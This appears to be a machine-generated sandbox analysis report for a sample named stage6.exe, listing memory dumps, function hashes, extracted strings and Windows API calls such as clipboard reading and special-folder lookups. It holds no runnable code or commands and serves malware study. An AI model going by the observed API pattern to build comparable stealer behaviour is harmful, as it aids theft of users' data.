
Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7c5a6c78df553c53129b73c5457b6f8ac1480546941694d03d74f2f631eddc0
Instruction ID: e3e16b60b8fb86eb43b6d65c710775b73e98ed38290c213209efac7c711f6864
Opcode Fuzzy Hash: e7c5a6c78df553c53129b73c5457b6f8ac1480546941694d03d74f2f631eddc0
Instruction Fuzzy Hash: 6831A578A017688FDBA5CF28C894E99BBB6FB48301F1041D9E809A7355DB34AEC5CF40

Function 066F71E1 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0a0a3deb3410229cfb4bf045b02757916fccf2658a3a9330d49e56064614eef
Instruction ID: 1379047aec5107f294f5edae26bd6f6706fc3f3eb5d3619044731690c626ae91
Opcode Fuzzy Hash: f0a0a3deb3410229cfb4bf045b02757916fccf2658a3a9330d49e56064614eef
Instruction Fuzzy Hash: 18114F34D5422ACFDBA0DF58C898BEAB7B2FB04344F1150E9E519A7281CB744EC48F92

Function 066F2A8A Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2abf91956a45506ccc1bde333c2e82b01691a08a54dd090d44078ecf9166dadf
Instruction ID: 033facd81e3786b63f5ba332719b71768d2699356cf4ce095bd1cebef0bf1ed2
Opcode Fuzzy Hash: 2abf91956a45506ccc1bde333c2e82b01691a08a54dd090d44078ecf9166dadf
Instruction Fuzzy Hash: CD112A78E102188FCB65DF24D8846D9B7B2FB4C341F1050E9A60DA3340D7345EC28F50

Function 0670D440 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50ab34e5009dffd4f38309209daa28236581e69d0daa54be42c216212f356d2a
Instruction ID: cc1624ad26e5e6d496c5f42fab8b79a4aecb51fe484956dac37a862c51e904f8
Opcode Fuzzy Hash: 50ab34e5009dffd4f38309209daa28236581e69d0daa54be42c216212f356d2a
Instruction Fuzzy Hash: BBE0A574D04208EFDB94DFA8D9446ACBBF4EB48300F10C1AA9C1893341D635AA51DB95

Function 0670A0E8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50ab34e5009dffd4f38309209daa28236581e69d0daa54be42c216212f356d2a
Instruction ID: 872d8932b867964268702ff0b187346327638c8f71aec8f3a186c8c6fd755330
Opcode Fuzzy Hash: 50ab34e5009dffd4f38309209daa28236581e69d0daa54be42c216212f356d2a
Instruction Fuzzy Hash: BBE0C974D04208EFDB94DFA8D944AACBBF4EB48310F10C1AA980893381D7759A51DF94

Function 06705998 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50ab34e5009dffd4f38309209daa28236581e69d0daa54be42c216212f356d2a
Instruction ID: 9b548f7875d902695a91d8f6c5ae801e508ce9e2952a98dcf1f2a76d1cc08033
Opcode Fuzzy Hash: 50ab34e5009dffd4f38309209daa28236581e69d0daa54be42c216212f356d2a
Instruction Fuzzy Hash: 9BE0C974D05208EFEB94DFA8DA446ADBBF5EB48310F10C1AA9C0893340D7359A51DF94

Function 0670FDC8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc38897e5d495457ac4331ee73022279ddecbaac3a6dcb81aca2e41a3edbef9f
Instruction ID: e12bbca4cd99a44cd6ba35e482ebb18e52c2f279d2df3c091ceb03bccfb1b5cf
Opcode Fuzzy Hash: fc38897e5d495457ac4331ee73022279ddecbaac3a6dcb81aca2e41a3edbef9f
Instruction Fuzzy Hash: 4AE0DF74808208EBD714EF94D800AACBBB8AB45304F24C0A9DC0853380C6319A41DBA4

Function 067086A0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1340d004725a0fe054d302ef3d63f4859d462306675875d6cc754cdcb1477b0
Instruction ID: ce3d5562c4213d794ab0f6ecc167458947667f9eb89dad1e86db2892b933521c
Opcode Fuzzy Hash: b1340d004725a0fe054d302ef3d63f4859d462306675875d6cc754cdcb1477b0
Instruction Fuzzy Hash: 50E01234D08208EFDB54DBA8D9406ACBBF8EB89204F14C1AAC81857382D7359A82DB95

Function 0670DF50 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 456446838864aa8faf807e5a97716ef8f67a598250bbb09decd56ca59ee97348
Instruction ID: eb7dfd3f073f427f845dcec8303fe25ce9ab64561064e6aaa42f38a53e20f620
Opcode Fuzzy Hash: 456446838864aa8faf807e5a97716ef8f67a598250bbb09decd56ca59ee97348
Instruction Fuzzy Hash: 19E01234D08208EBDB54DFD4D9455ACBBB8EF45304F14D1ADD81827385C7316E52DB95

Function 0670AF38 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5461baa469397d30b6cd30f90cd7e11265adb5880d9861cfd8671412adc77e8
Instruction ID: 0d87071dee3678c45b98cc3d13b13cfa2986bf467612d7ea4d707fa99f52c4b3
Opcode Fuzzy Hash: a5461baa469397d30b6cd30f90cd7e11265adb5880d9861cfd8671412adc77e8
Instruction Fuzzy Hash: 28E0EC71941208FBDB14EBB4D904A9E77E8EB05240F0045E6D50893150EA715A14EBA6

Non-executed Functions

Function 0670DF90 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ea361767d81326988703d5556d2d756de569bc0975190a28a4706ae73c97838
Instruction ID: 84b7273e7b4ce34e328277fb2db55b9874a01a122886e12847c741d4f55bcea6
Opcode Fuzzy Hash: 4ea361767d81326988703d5556d2d756de569bc0975190a28a4706ae73c97838
Instruction Fuzzy Hash: 5D912870D05218CFFB64DFA9D884BADBBF6BF49300F1084AAD419A7281DB745985CF61

Function 066F0006 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f10816ffe418d837f2f613e9a3b2b270acf1f1390d566bd344c64037d5533c2
Instruction ID: d7a9163c9e9625428e21f67c7ff59fc07a2a01cc950c007b26d66ed8dad04214
Opcode Fuzzy Hash: 3f10816ffe418d837f2f613e9a3b2b270acf1f1390d566bd344c64037d5533c2
Instruction Fuzzy Hash: 39315E71D097558FEB69CF6A8C54299BBF7BF85300F04C0FAD508A6256DB740A85CF50

Function 066F0040 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 087de318a5a1d7a16491882523071a3fcbd3c7734a752d5faa9bea54c1daaa25
Instruction ID: e25b2593a90dc1f4bebc1b95fce981c6b8d0bb8ce8c0620403a84df561c25f09
Opcode Fuzzy Hash: 087de318a5a1d7a16491882523071a3fcbd3c7734a752d5faa9bea54c1daaa25
Instruction Fuzzy Hash: 2321E9B1E04619CBEB68CF5BC854299FAF7BFC8300F14D0BAD50CA6254DB740A958F50

Function 0670A138 Relevance: 5.1, Strings: 4, Instructions: 76COMMON

Download Yara Rule

Strings

$, xrefs: 0670A188
#, xrefs: 0670A5AC
\sq, xrefs: 0670A53C
', xrefs: 0670A58B

Memory Dump Source

Source File: 00000000.00000002.1158430522.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_stage6.jbxd

Similarity

API ID:
String ID: #$$$'$\sq
API String ID: 0-2157715064
Opcode ID: a0705cd370dac82d1485b961d73c32546dd97751b5f55cd9e4c4401b341b0e00
Instruction ID: c417bd8caa2d232163d8ce55506a0743d4b6324a3f2078d60c1ba321677c726b
Opcode Fuzzy Hash: a0705cd370dac82d1485b961d73c32546dd97751b5f55cd9e4c4401b341b0e00
Instruction Fuzzy Hash: 8B310774D00228DFEB64CFA5D844BEDB7F6FB89300F0085AAD519A3281DB744A85CFA0

Analysis Process: stage6.exePID: 6536, Parent PID: 3964COMMON

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	15.1%
Total number of Nodes:	73
Total number of Limit Nodes:	7

Executed Functions

Function 00408850 Relevance: 7.7, APIs: 5, Instructions: 194
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 0040891C
GetCurrentThreadId.KERNEL32 ref: 00408925
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
GetForegroundWindow.USER32 ref: 00408A33

Part of subcall function 0040C550: CoInitializeEx.OLE32(00000000,00000002), ref: 0040C563

Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7

ExitProcess.KERNEL32 ref: 00408AD1

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

Function 0043C1F0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043C767 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

,+*), xrefs: 0043C790

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: ,+*)
API String ID: 0-3529585375
Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58

Function 0040B70C Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

o`, xrefs: 0040B74B

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: o`
API String ID: 0-3993896143
Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719

Function 00436145 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00436165

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: c20870ad1c2550df031d9ae96be031c5a683c54f8c490753efcc1857bb42eeb8
Instruction ID: 741c48333e69648009e785c6466c575ff7d71c05fd411e4f0ced63eefbf4b49a
Opcode Fuzzy Hash: c20870ad1c2550df031d9ae96be031c5a683c54f8c490753efcc1857bb42eeb8
Instruction Fuzzy Hash: 86115B32D052968FDB14CB3C8C502ADBFB15F8A320F1983EDD8A5A33D5D9304E428B51

Function 0043C2C8 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043CCAF

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

Function 0043C180 Relevance: 1.5, APIs: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040B2E4,00000000,00000001), ref: 0043C1B2

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
Instruction ID: ec0cbf63999808cd9fde2cf832404b9ab0848eb4eaaead86bc709d6aa026588d
Opcode Fuzzy Hash: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
Instruction Fuzzy Hash: 59F0E977808211EBD2003F257C01A5736649F8F735F01587AFC0152112D739D422E6AF

Function 0043AAA0 Relevance: 1.5, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8

Function 0043AA80 Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8

Non-executed Functions

Function 00426B50 Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 439COMMON

Download Yara Rule

Strings

EG, xrefs: 0042740B
bweM, xrefs: 004276F0
!, xrefs: 00427452
$&, xrefs: 004275AF
UGBY, xrefs: 00427708
>C7E, xrefs: 00427340
;[0], xrefs: 0042732A
l+X-, xrefs: 004272FE
NO, xrefs: 00427361
{7y9, xrefs: 004272C7
w?n!, xrefs: 004272DD
g#X%, xrefs: 004272E8
+K!M, xrefs: 00427356
*W.Y, xrefs: 0042731F
FOEH, xrefs: 0042771E
U'g), xrefs: 004272F3

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
API String ID: 0-3492884535
Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A

Function 00423860 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 501COMMON

Download Yara Rule

Strings

A[, xrefs: 00423D14
{\}, xrefs: 00423E3E
/G$I, xrefs: 00423E16
7N1@, xrefs: 00423ED0, 00423EE1
Fg)i, xrefs: 00423E56
OU, xrefs: 00423CFC
WE, xrefs: 00423D04

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
API String ID: 0-1763234448
Opcode ID: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
Opcode Fuzzy Hash: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86

Function 0041CB40 Relevance: 10.7, Strings: 8, Instructions: 658COMMON

Download Yara Rule

Strings

KT, xrefs: 0041CF31
Q, xrefs: 0041CF39
xy, xrefs: 0041D23E
qr, xrefs: 0041D063
_q, xrefs: 0041D1C5
0u4w, xrefs: 0041D236
SV, xrefs: 0041CF29
p8`;, xrefs: 0041CDBD

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
API String ID: 0-1826372655
Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A

Function 00419F30 Relevance: 10.4, APIs: 2, Strings: 3, Instructions: 1664COMMON

Download Yara Rule

APIs

Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E

FreeLibrary.KERNEL32(?), ref: 0041A6BD
FreeLibrary.KERNEL32(?), ref: 0041A77B

Strings

46, xrefs: 0041A3EA
/,-, xrefs: 0041A991
/ , xrefs: 0041A402

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: / $/,-$46
API String ID: 764372645-479303636
Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B

Function 00415799 Relevance: 9.2, Strings: 7, Instructions: 492COMMON

Download Yara Rule

Strings

NDNK, xrefs: 00415D85
8MNO, xrefs: 00415C36
~, xrefs: 0041596E
<I2K, xrefs: 00415C2B
oA&C, xrefs: 00415CE6
RXA, xrefs: 00415842
X, xrefs: 00415DD2

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
API String ID: 0-3328159043
Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86

Function 004329C0 Relevance: 9.1, APIs: 6, Instructions: 144clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004329E2
GetClipboardData.USER32 ref: 00432A05
GlobalLock.KERNEL32 ref: 00432A22
GlobalUnlock.KERNEL32 ref: 00432B6B
CloseClipboard.USER32 ref: 00432B73

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797

Function 00408F50 Relevance: 9.0, Strings: 7, Instructions: 223COMMON

Download Yara Rule

Strings

wkw6, xrefs: 00409045
z/6q, xrefs: 0040903D
(, xrefs: 00409065
|$Nb, xrefs: 00409025
x|j~, xrefs: 0040904D
jqci, xrefs: 0040901D
ye{|, xrefs: 00409035

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
API String ID: 0-2309992716
Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A

Function 00409580 Relevance: 7.9, Strings: 6, Instructions: 442COMMON

Download Yara Rule

Strings

\, xrefs: 0040978A
+8=>, xrefs: 00409782
PK, xrefs: 004099E1
#4<7, xrefs: 00409772
r, xrefs: 004095F4
Tiec, xrefs: 00409963

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: #4<7$+8=>$PK$Tiec$\$r
API String ID: 0-1906979145
Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46

